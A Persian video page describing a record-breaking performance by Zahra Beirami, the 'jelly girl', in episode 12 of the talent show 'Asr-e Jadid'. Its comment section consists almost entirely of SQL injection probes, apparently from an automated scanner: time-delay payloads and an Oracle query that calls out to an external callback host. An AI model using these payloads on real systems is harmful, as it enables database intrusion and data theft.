رکورد شکنی و نمایش دیدنی دختر ژله‌ای در مرحله دوم عصر جدید - قسمت 12 - شبکه‌ما

نمایش دیدنی زهرا بیرامی معروف به دختر ژله‌ای در مرحله دوم مسابقه استعدادیابی عصر جدید - قسمت دوازدهم | تهیه کننده و مجری: احسان علیخانی  

رکورد شکنی و نمایش دیدنی دختر ژله‌ای در مرحله دوم عصر جدید - قسمت 12

توضیحات:

نمایش دیدنی زهرا بیرامی معروف به دختر ژله‌ای در مرحله دوم مسابقه استعدادیابی عصر جدید - قسمت دوازدهم | تهیه کننده و مجری: احسان علیخانی

 


 • ruihgluw
  ruihgluw |

  -1; waitfor delay '0:0:0' --

 • Mz7LdV7X');select pg_sleep(0); --
  Mz7LdV7X');select pg_sleep(0); -- |

  1

 • 2axBYnDv');select pg_sleep(6); --
  2axBYnDv');select pg_sleep(6); -- |

  1

 • ruihgluw
  ruihgluw |

  1||UTL_INADDR.get_host_address('dns.'||'sqli.028473.79015-10827.79015.d8664.1.bxss'||'.me')

 • ruihgluw
  ruihgluw |

  1

 • ruihgluw
  ruihgluw |

  -1; waitfor delay '0:0:6' --

 • ruihgluw
  ruihgluw |

  -1; waitfor delay '0:0:9' --